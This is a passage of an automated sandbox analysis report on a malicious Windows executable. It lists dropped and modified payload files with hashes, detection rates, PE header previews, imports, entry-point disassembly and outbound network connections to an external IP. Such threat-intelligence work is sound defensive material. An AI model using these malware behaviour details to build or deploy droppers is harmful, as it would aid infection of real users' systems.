                                                                                    SSDEEP:3072:8gJO/TK0wdrrseL/iyoWo5s1412e1YqsVf0cnas1pbzeVCTAaGtR:8gJsmFdEeLfoW1412toQas1XAvtR
                                                                                    MD5:0CA939E14D58B13997144F0AF89ADEA9
                                                                                    SHA1:65DD44DDE830E9CBAB5149369A333D4F6464E86D
                                                                                    SHA-256:A2C60618D112DA73E9019312A77CD8CD78A4E924E128F21DC8410E012A510CD3
                                                                                    SHA-512:FD9C6B5A9CD78AAC50443B44DFC46F5F60F17D1F3D858B7B85097D66EA703BB8491B63EBBA3A2F2C3A7869FDFBB1BF9F8A3A763B015E0886DA0526BE59309DFB
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                    Reputation:unknown
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............e...e...e.B....e.....e....e.......e...d.x.e.....e.....e......e.Rich..e.........................PE..L......b.....................>.......w............@.............................................................................P...............................4...@................................>..@............................................text...~........................... ..`.data............8..................@....rsrc............ ..................@..@.reloc...'.......(..................@..B................................................................................................................................................................................................................................................................................................................................................................
                                                                                    Process:C:\Windows\explorer.exe
                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):198656
                                                                                    Entropy (8bit):7.0336896297722555
                                                                                    Encrypted:false
                                                                                    SSDEEP:3072:9SbOLZRNAmrLJhkdW75GZK926+oi75o0eEHSLVWE8:9Sbc5rLUd5Z76+J5xeEkVWE8
                                                                                    MD5:29C3DE14DFFA53EDC7E690D0FC0ECCE2
                                                                                    SHA1:B35F5F268762A950EB18741B4944DB7DB232DB00
                                                                                    SHA-256:81AF8254226542C9E5538369E4643DB192DB7BC31817BBCF0931AA897B11CA84
                                                                                    SHA-512:03E68667B3C8361860464F81E38A074E148A3A017405BA6D641901D0F1F887006DFEE326C8A7D868781C69DF162885FACB94223B2CCF656E88C1AAB62B4C456E
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                    Reputation:unknown
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....................B.s.....p.....f..............w...a.....q.....t....Rich...........PE..L.....Vb.....................>......Or............@..................................l......................................L...P...................................@...............................p9..@............................................text............................... ..`.data............8..................@....rsrc............ ..................@..@.reloc..n'.......(..................@..B................................................................................................................................................................................................................................................................................................................................................................................
                                                                                    Process:C:\Windows\explorer.exe
                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):200192
                                                                                    Entropy (8bit):7.021128640275825
                                                                                    Encrypted:false
                                                                                    SSDEEP:3072:KGmOScBINJYW7LNxrWU5qJw5TN7Ow+CsfOaMqhpmx7OwSSZ+ER:KGmkIB7LTrwyd717OOrR
                                                                                    MD5:3A452937E8A961C5E19974C2CBB4AFAA
                                                                                    SHA1:6C8522AC545442F29B6A5A768FA9F0FC4A38A928
                                                                                    SHA-256:DE5F535B0A84C65BB341EE58B72BDA0B75C18CD795EFF21A5318D0BFDAEE21BD
                                                                                    SHA-512:C12172037F48F14394CD2D408DC2B31AD683C253B57EB807949F05E53AF95954BA8D10EBCBAD4B0562AB69D932F2D8463E4891350756170940054182A72D8252
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                    • Antivirus: ReversingLabs, Detection: 56%
                                                                                    Reputation:unknown
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............e...e...e.B....e.....e....e.......e...d.x.e.....e.....e......e.Rich..e.........................PE..L.....~b.....................>.......w............@.................................o...........................................P...............................@...@................................>..@............................................text...~........................... ..`.data............8..................@....rsrc............ ..................@..@.reloc...'.......(..................@..B................................................................................................................................................................................................................................................................................................................................................................
                                                                                    Process:C:\Windows\explorer.exe
                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                    Category:modified
                                                                                    Size (bytes):3847168
                                                                                    Entropy (8bit):7.985609186180041
                                                                                    Encrypted:false
                                                                                    SSDEEP:98304:MSQ3/Y0ws5Zw/QJCZObVeCuMFWxrMKUs+mNXc:MSQPY/s5stsPDIoKUs+
                                                                                    MD5:7E01B1A967FADD92B78A52411556C945
                                                                                    SHA1:B8C9839599B8F721E05B68B2E9AFE81FB8FC5225
                                                                                    SHA-256:696682568C05C3EA48ABA981D359133B72457417C8C10C27A80BDF83CCEC7B61
                                                                                    SHA-512:BA4AC3BC16A6B71A4B7F564625C536AAC4C9F1C950B3D9604DFA6F61E37690B5A261857D007F85CCB059255CD837C29FFEB4410C5F87EB2F15839BEACA1AB47D
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                    Reputation:unknown
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....................B.s.....p.....f..............w...a.....q.....t....Rich...........PE..L....;.b......................K.....Or............@...........................O.....w.:.....................................L...P.... M......................0O.....@........................9......p9..@............................................text............................... ..`.data....}K.......8.................@....rsrc........ M.. ...H:.............@..@.reloc...J...0O..L...h:.............@..B................................................................................................................................................................................................................................................................................................................................................................................
                                                                                    Process:C:\Users\user\AppData\Local\Temp\A33B.exe
                                                                                    File Type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):3890176
                                                                                    Entropy (8bit):7.902408557753204
                                                                                    Encrypted:false
                                                                                    SSDEEP:49152:8Pu803iSM2N7aUjjqpEbUS2qv5MQBsSY/b7KoiTFUgxylC42lVJpiU71PP:s12BEE4vqxMQzub7OTFUgxylqTiU7J
                                                                                    MD5:3006B49F3A30A80BB85074C279ACC7DF
                                                                                    SHA1:728A7A867D13AD0034C29283939D94F0DF6C19DF
                                                                                    SHA-256:F283B4C0AD4A902E1CB64201742CA4C5118F275E7B911A7DAFDA1EF01B825280
                                                                                    SHA-512:E8FC5791892D7F08AF5A33462A11D39D29B5E86A62CBF135B12E71F2FCAAA48D40D5E3238F64E17A2F126BCFB9D70553A02D30DC60A89F1089B2C1E7465105DD
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 92%
                                                                                    Reputation:unknown
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...Bu.c...............&.....X;................@..............................;.....!.;...`... ...............................................8.......9.......8...............;...............................8.(...................D.8..............................text...............................`..`.data.....7.......7.................@....rdata........8.......8.............@..@.pdata........8.......8.............@..@.xdata........8.......8.............@..@.bss....8.....8..........................idata........8.......8.............@....CRT....h.....8.......8.............@....tls..........9.......8.............@....rsrc.........9.......8.............@....reloc........;......Z;.............@..B........................................................................................................................................................................
                                                                                    Process:C:\Users\user\AppData\Local\Temp\pliu.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):571230
                                                                                    Entropy (8bit):7.964582338724255
                                                                                    Encrypted:false
                                                                                    SSDEEP:12288:FV1e0UgkVT6ZT+3JCnoxgLgoCXwbePLJrH8fwpL:FV1edgkV8T0CnoxZ4ePLJTMwpL
                                                                                    MD5:30D5F615722D12FDDA4F378048221909
                                                                                    SHA1:E94E3E3A6FAE8B29F0F80128761AD1B69304A7EB
                                                                                    SHA-256:B7CB464CD0C61026EC38D89C0A041393BC9369E217303677551EEC65A09D2628
                                                                                    SHA-512:A561A224D7228EC531A966C7DBD6BC88138E2F4A1C8112E5950644F69BF3A43B1E87E03BC1B4FD5E9CA071B5A9353B18697573404602CCD51F2946FAF95144C2
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview:P,..Hh.j...?...O}3..8v,)cml.T/.....V.r.....n.?y..oz#V......N.{.....!....Y."..)v.T.........Ub.V..*.)..8..,.%.{4.yWrA.a36&..,...V...l9.y....39.y...wW.j.ox.....I..;..%..p.b..>..j.....j..awT..r...j....o./.7...,=uk..i../h..j*j.P.j..?.-X.k..R}.j.5.b-F.k..c........j...j..Q?...).qe......,o'k.....j.J..))O.......k..\.....u,..k...,..k....k...tOT.X.jXe-.k..7.k...83U.......%..o.....Y%.....7.F.(j...KP..I..j..y...o..no......z......u/..DJP.e+.Dj..Z....k.......j$T.X.j[..`....o....k{..2|6...H.....c%..........z......~^..j.-s.....o.-........6.L.`.j.-s.....i|..y.Q'....k...}FT.X.jY..Y....o......y..=|6..%..z/........s....>.j.-s.k../.:..........>|/...h...2/..R..-......k....9.y.....j.6Z.j.o....l&..%.UD..`....&..t>".6g..j,..../W=..5...n.......X..h>.k..'...|/h..jfDX.S...`&*...Y....)U]bc[......'(..l..+....b.i....[...If!S...r......i.....Q^..*.....aeddT.`.'....*.[.h....e...?>....n....5......-..j..T..ow......k....-...k16.+i(~..L....j,...c.L./w=j...~./
                                                                                    Process:C:\Users\user\AppData\Local\Temp\pliu.exe
                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):53248
                                                                                    Entropy (8bit):5.2806602069772195
                                                                                    Encrypted:false
                                                                                    SSDEEP:384:XehpWSsdMRgTh4QPt0RaYaGCp9FclU2sSadM7yjR+Lcuczw0RoR/5rdy7olDJfUw:ipW6+grtlU2v7yGLwwouflpZ2tVtkTF
                                                                                    MD5:1B20E998D058E813DFC515867D31124F
                                                                                    SHA1:C9DC9C42A748AF18AE1A8C882B90A2B9E3313E6F
                                                                                    SHA-256:24A53033A2E89ACF65F6A5E60D35CB223585817032635E81BF31264EB7DABD00
                                                                                    SHA-512:79849FBDB9A9E7F7684B570D14662448B093B8AA2B23DFD95856DB3A78FAF75A95D95C51B8AA8506C4FBECFFEBCC57CD153DDA38C830C05B8CD38629FAE673C6
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 42%
                                                                                    Reputation:unknown
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........R....................................7......................................Rich............................PE..L.....c...........!.....p...P......................................................>W.................................@...$...<...............................4...................................0...@............................................text....g.......p.................. ..`.rdata........... ..................@..@.data...............................@....rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................
                                                                                    Process:C:\Users\user\AppData\Local\Temp\A33B.exe
                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):3657728
                                                                                    Entropy (8bit):7.795668090342615
                                                                                    Encrypted:false
                                                                                    SSDEEP:98304:8gleOA+U9OYPQAY0YdNa1rcO7B9elk44MRTVkVu:tleOA+oDP20YdNa1IM90YMRTm
                                                                                    MD5:81A0ECC23B44DA5116D397C0A3104A05
                                                                                    SHA1:01EFD55A04010EC4E7197BCAC7EC351BB8E5BF07
                                                                                    SHA-256:3F59D2CF23B45B7F56563E85BF818F827F2607D12661FB438BCF031550EC0EC0
                                                                                    SHA-512:CF0C87B4B5101898A48AB312CD1436E2738762EE74D1D77A29635053A373D5DFF237DA84A17DFE7897C7E99B919325FF8C47238A2FD06DFDB04F3D18F4A97185
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                    • Antivirus: ReversingLabs, Detection: 77%
                                                                                    Reputation:unknown
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...?;.c..........#...................:........@..............................b........... ...................................................-.d.....a......^a............................................8.+.0...@]a.8............................................text...P........................... ..`.rdata..b...........................@..@.data..............................@....pdata...... ......................@..@_RDATA..............................@..@.vmp0... T..........................`..`.vmp1...t.7.. *...7.................`..h.rsrc.........a.......7.............@..@................................................................................................................................................................................................................................................................................................
                                                                                    Process:C:\Users\user\AppData\Local\Temp\A33B.exe
                                                                                    File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):163840
                                                                                    Entropy (8bit):5.025420345934772
                                                                                    Encrypted:false
                                                                                    SSDEEP:768:Dz6Gwy7E2OreQTFwf32MVnZbmQNLk7mtlqWGG9Lto8hecAD9Grp/2mPYHfMDy4If:ZyrRqf32MXb38mSzuhPAK/23kTktX6
                                                                                    MD5:B9363486500E209C05F97330226BBF8A
                                                                                    SHA1:BFE2D0072D09B30EC66DEE072DDE4E7AF26E4633
                                                                                    SHA-256:01138F2318E59E1FE59F1EB7DE3859AF815EBF9A59AAE1084C1A97A99319EE35
                                                                                    SHA-512:6D06E5BAEAB962D85B306C72F39A82E40E22EB889867C11C406A069011155CB8901BF021F48EFC98FD95340BE7E9609FC11F4E24FC322DBF721E610120771534
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 85%
                                                                                    Reputation:unknown
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......../2N.N\..N\..N\...!..N\...1..N\.uA...N\...2..N\.uA...N\..N]..N\......N\...$..N\.Rich.N\.................PE..L.....c.............................)............@................................. ...........................................<....@...E..........................`...................................@............... ............................text............................... ..`.rdata...+.......0..................@..@.data...8"....... ..................@....rsrc....P...@...P...0..............@..@........................................................................................................................................................................................................................................................................................................................................................................
                                                                                    Process:C:\Windows\explorer.exe
                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):198656
                                                                                    Entropy (8bit):7.0336896297722555
                                                                                    Encrypted:false
                                                                                    SSDEEP:3072:9SbOLZRNAmrLJhkdW75GZK926+oi75o0eEHSLVWE8:9Sbc5rLUd5Z76+J5xeEkVWE8
                                                                                    MD5:29C3DE14DFFA53EDC7E690D0FC0ECCE2
                                                                                    SHA1:B35F5F268762A950EB18741B4944DB7DB232DB00
                                                                                    SHA-256:81AF8254226542C9E5538369E4643DB192DB7BC31817BBCF0931AA897B11CA84
                                                                                    SHA-512:03E68667B3C8361860464F81E38A074E148A3A017405BA6D641901D0F1F887006DFEE326C8A7D868781C69DF162885FACB94223B2CCF656E88C1AAB62B4C456E
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                    Reputation:unknown
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....................B.s.....p.....f..............w...a.....q.....t....Rich...........PE..L.....Vb.....................>......Or............@..................................l......................................L...P...................................@...............................p9..@............................................text............................... ..`.data............8..................@....rsrc............ ..................@..@.reloc..n'.......(..................@..B................................................................................................................................................................................................................................................................................................................................................................................
                                                                                    Process:C:\Windows\explorer.exe
                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):198144
                                                                                    Entropy (8bit):7.041743566438781
                                                                                    Encrypted:false
                                                                                    SSDEEP:3072:hlrXO4DHzvDSyUPLoigWo351k/Z2N/BbET2tOWIbq0ES4vy3DwHkEforb:/rXbT0PL1g5W2pZETbWIULvy3UHkEQ
                                                                                    MD5:17A74A0281CEFB5D9C29022FBC79981A
                                                                                    SHA1:D88585C6C9488B6D28B71DD0659EDB8649E32DCA
                                                                                    SHA-256:2814B2A02771E2D16CE2EFB1586D8623B54B50D6E1C8DFA9AB2BBF54AB8B249D
                                                                                    SHA-512:E53AE73584F2DE67589AB0354F4D7CF16053109E4AC458E962C17EE5DFBE65BFDCD05553574E839EBCF2925A130D75BC14994B908A2928F017776D43A7BFDD55
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                    • Antivirus: ReversingLabs, Detection: 49%
                                                                                    Reputation:unknown
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....................B.s.....p.....f..............w...a.....q.....t....Rich...........PE..L......b.....................<......_r............@.........................................................................\...P...................................@...............................p9..@............................................text............................... ..`.data............6..................@....rsrc............ ..................@..@.reloc..n'.......(..................@..B................................................................................................................................................................................................................................................................................................................................................................................
                                                                                    Process:C:\Windows\explorer.exe
                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):26
                                                                                    Entropy (8bit):3.95006375643621
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:ggPYV:rPYV
                                                                                    MD5:187F488E27DB4AF347237FE461A079AD
                                                                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                    Malicious:true
                                                                                    Reputation:unknown
                                                                                    Preview:[ZoneTransfer]....ZoneId=0
                                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                    Entropy (8bit):7.041743566438781
                                                                                    TrID:
                                                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                    File name:file.exe
                                                                                    File size:198144
                                                                                    MD5:17a74a0281cefb5d9c29022fbc79981a
                                                                                    SHA1:d88585c6c9488b6d28b71dd0659edb8649e32dca
                                                                                    SHA256:2814b2a02771e2d16ce2efb1586d8623b54b50d6e1c8dfa9ab2bbf54ab8b249d
                                                                                    SHA512:e53ae73584f2de67589ab0354f4d7cf16053109e4ac458e962c17ee5dfbe65bfdcd05553574e839ebcf2925a130d75bc14994b908a2928f017776d43a7bfdd55
                                                                                    SSDEEP:3072:hlrXO4DHzvDSyUPLoigWo351k/Z2N/BbET2tOWIbq0ES4vy3DwHkEforb:/rXbT0PL1g5W2pZETbWIULvy3UHkEQ
                                                                                    TLSH:7514CF3336D0F072C96B55305834DBA57ABFB8319675899B7BA807AE5F303E06336252
                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................B.s.......p.......f.................w.....a.......q.......t.....Rich............PE..L......b...................
                                                                                    Icon Hash:70d0eeeaeacae2dd
                                                                                    Entrypoint:0x40725f
                                                                                    Entrypoint Section:.text
                                                                                    Digitally signed:false
                                                                                    Imagebase:0x400000
                                                                                    Subsystem:windows gui
                                                                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                    DLL Characteristics:NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                    Time Stamp:0x62F4FA9D [Thu Aug 11 12:48:29 2022 UTC]
                                                                                    TLS Callbacks:
                                                                                    CLR (.Net) Version:
                                                                                    OS Version Major:5
                                                                                    OS Version Minor:0
                                                                                    File Version Major:5
                                                                                    File Version Minor:0
                                                                                    Subsystem Version Major:5
                                                                                    Subsystem Version Minor:0
                                                                                    Import Hash:87e1f4e32d01d5a52e605f27fd138118
                                                                                    Instruction
                                                                                    call 00007F1A14C0985Ch
                                                                                    jmp 00007F1A14C031CEh
                                                                                    int3
                                                                                    int3
                                                                                    int3
                                                                                    int3
                                                                                    int3
                                                                                    int3
                                                                                    int3
                                                                                    mov ecx, dword ptr [esp+04h]
                                                                                    test ecx, 00000003h
                                                                                    je 00007F1A14C03376h
                                                                                    mov al, byte ptr [ecx]
                                                                                    add ecx, 01h
                                                                                    test al, al
                                                                                    je 00007F1A14C033A0h
                                                                                    test ecx, 00000003h
                                                                                    jne 00007F1A14C03341h
                                                                                    add eax, 00000000h
                                                                                    lea esp, dword ptr [esp+00000000h]
                                                                                    lea esp, dword ptr [esp+00000000h]
                                                                                    mov eax, dword ptr [ecx]
                                                                                    mov edx, 7EFEFEFFh
                                                                                    add edx, eax
                                                                                    xor eax, FFFFFFFFh
                                                                                    xor eax, edx
                                                                                    add ecx, 04h
                                                                                    test eax, 81010100h
                                                                                    je 00007F1A14C0333Ah
                                                                                    mov eax, dword ptr [ecx-04h]
                                                                                    test al, al
                                                                                    je 00007F1A14C03384h
                                                                                    test ah, ah
                                                                                    je 00007F1A14C03376h
                                                                                    test eax, 00FF0000h
                                                                                    je 00007F1A14C03365h
                                                                                    test eax, FF000000h
                                                                                    je 00007F1A14C03354h
                                                                                    jmp 00007F1A14C0331Fh
                                                                                    lea eax, dword ptr [ecx-01h]
                                                                                    mov ecx, dword ptr [esp+04h]
                                                                                    sub eax, ecx
                                                                                    ret
                                                                                    lea eax, dword ptr [ecx-02h]
                                                                                    mov ecx, dword ptr [esp+04h]
                                                                                    sub eax, ecx
                                                                                    ret
                                                                                    lea eax, dword ptr [ecx-03h]
                                                                                    mov ecx, dword ptr [esp+04h]
                                                                                    sub eax, ecx
                                                                                    ret
                                                                                    lea eax, dword ptr [ecx-04h]
                                                                                    mov ecx, dword ptr [esp+04h]
                                                                                    sub eax, ecx
                                                                                    ret
                                                                                    cmp ecx, dword ptr [0042C2B0h]
                                                                                    jne 00007F1A14C03354h
                                                                                    rep ret
                                                                                    jmp 00007F1A14C0984Ch
                                                                                    push eax
                                                                                    push dword ptr fs:[00000000h]
                                                                                    lea eax, dword ptr [esp+0Ch]
                                                                                    sub esp, dword ptr [esp+0Ch]
                                                                                    push ebx
                                                                                    push esi
                                                                                    push edi
                                                                                    mov dword ptr [eax], ebp
                                                                                    mov ebp, eax
                                                                                    mov eax, dword ptr [0042C2B0h]
                                                                                    Programming Language:
                                                                                    • [ASM] VS2008 build 21022
                                                                                    • [ C ] VS2008 build 21022
                                                                                    • [IMP] VS2005 build 50727
                                                                                    • [C++] VS2008 build 21022
                                                                                    • [RES] VS2008 build 21022
                                                                                    • [LNK] VS2008 build 21022
                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x1875c0x50.text
                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x15a0000x1ee8.rsrc
                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x15c0000xf08.reloc
                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x12400x1c.text
                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x39700x40.text
                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x10000x1f4.text
                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                    NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                    .text0x10000x1830a0x18400False0.5318943298969072COM executable for DOS6.3718422303346625IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                    .data0x1a0000x13f3b00x13600False0.9458291330645161data7.8477215097242885IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                    .rsrc0x15a0000x1ee80x2000False0.610595703125data5.7865329961947936IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                    .reloc0x15c0000x276e0x2800False0.32138671875data3.342680269338327IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                    NameRVASizeTypeLanguageCountry
                                                                                    RT_ICON0x15a1c00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TibetanTibet
                                                                                    RT_ICON0x15a1c00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TibetanNepal
                                                                                    RT_ICON0x15a1c00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TibetanIndia
                                                                                    RT_ICON0x15aa680x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TibetanTibet
                                                                                    RT_ICON0x15aa680x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TibetanNepal
                                                                                    RT_ICON0x15aa680x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TibetanIndia
                                                                                    RT_STRING0x15bd900x4edataTibetanTibet
                                                                                    RT_STRING0x15bd900x4edataTibetanNepal
                                                                                    RT_STRING0x15bd900x4edataTibetanIndia
                                                                                    RT_STRING0x15bde00x50dataTibetanTibet
                                                                                    RT_STRING0x15bde00x50dataTibetanNepal
                                                                                    RT_STRING0x15bde00x50dataTibetanIndia
                                                                                    RT_STRING0x15be300xb6dataTibetanTibet
                                                                                    RT_STRING0x15be300xb6dataTibetanNepal
                                                                                    RT_STRING0x15be300xb6dataTibetanIndia
                                                                                    RT_GROUP_ICON0x15bb100x22dataTibetanTibet
                                                                                    RT_GROUP_ICON0x15bb100x22dataTibetanNepal
                                                                                    RT_GROUP_ICON0x15bb100x22dataTibetanIndia
                                                                                    RT_VERSION0x15bb380x258data
                                                                                    DLLImport
                                                                                    KERNEL32.dllRequestWakeupLatency, CreateFileA, FindActCtxSectionStringA, WriteConsoleInputA, ClearCommBreak, WriteFile, FindFirstVolumeMountPointW, CreateDirectoryExA, LocalSize, WaitForMultipleObjects, ReadConsoleInputA, GetProcessId, FreeUserPhysicalPages, WriteConsoleOutputAttribute, DebugActiveProcessStop, GetLocaleInfoW, GetProcAddress, LocalAlloc, GetCommandLineW, GetBinaryTypeW, InterlockedExchange, OpenMutexW, GetConsoleTitleA, SearchPathA, FreeConsole, EndUpdateResourceA, GetLastError, GetProfileSectionA, SetConsoleCursorInfo, GetConsoleAliasW, CreateSemaphoreA, GlobalFlags, GetConsoleAliasesLengthA, FindResourceW, SetVolumeMountPointW, GetModuleHandleW, HeapAlloc, GetComputerNameA, GetCurrentProcessId, CreateNamedPipeA, EnumResourceLanguagesA, SetHandleInformation, _hwrite, CreateActCtxA, DeleteVolumeMountPointA, MoveFileWithProgressA, AddRefActCtx, WritePrivateProfileStringA, GetUserDefaultLangID, QueryMemoryResourceNotification, WaitForSingleObject, GetLongPathNameW, InterlockedDecrement, VerifyVersionInfoA, EnumCalendarInfoW, FindNextFileW, EnumTimeFormatsA, SetLastError, SetCriticalSectionSpinCount, WritePrivateProfileSectionA, LoadLibraryA, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, RaiseException, RtlUnwind, HeapFree, DeleteFileA, GetStartupInfoW, GetModuleHandleA, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, InterlockedIncrement, GetCurrentThreadId, HeapCreate, VirtualFree, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, VirtualAlloc, HeapReAlloc, Sleep, ExitProcess, GetStdHandle, GetModuleFileNameA, GetModuleFileNameW, FreeEnvironmentStringsW, GetEnvironmentStringsW, SetHandleCount, GetFileType, GetStartupInfoA, QueryPerformanceCounter, GetTickCount, GetSystemTimeAsFileTime, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, HeapSize, InitializeCriticalSectionAndSpinCount, WideCharToMultiByte, LCMapStringA, MultiByteToWideChar, LCMapStringW, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, GetConsoleCP, GetConsoleMode, FlushFileBuffers, SetFilePointer, CloseHandle, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, SetStdHandle
                                                                                    USER32.dllGetComboBoxInfo
                                                                                    GDI32.dllGetTextFaceW
                                                                                    Language of compilation systemCountry where language is spokenMap
                                                                                    TibetanTibet
                                                                                    TibetanNepal
                                                                                    TibetanIndia
                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                    Feb 7, 2023 19:44:46.600966930 CET4969780192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:44:46.619282007 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:46.619430065 CET4969780192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:44:46.619829893 CET4969780192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:44:46.619877100 CET4969780192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:44:46.638236046 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:46.638267040 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:46.768254995 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:46.768284082 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:46.768481016 CET4969780192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:44:46.776756048 CET4969780192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:44:46.776806116 CET4969780192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:44:46.794220924 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:46.794245958 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:46.862286091 CET8049697188.114.96.3192.168.2.3
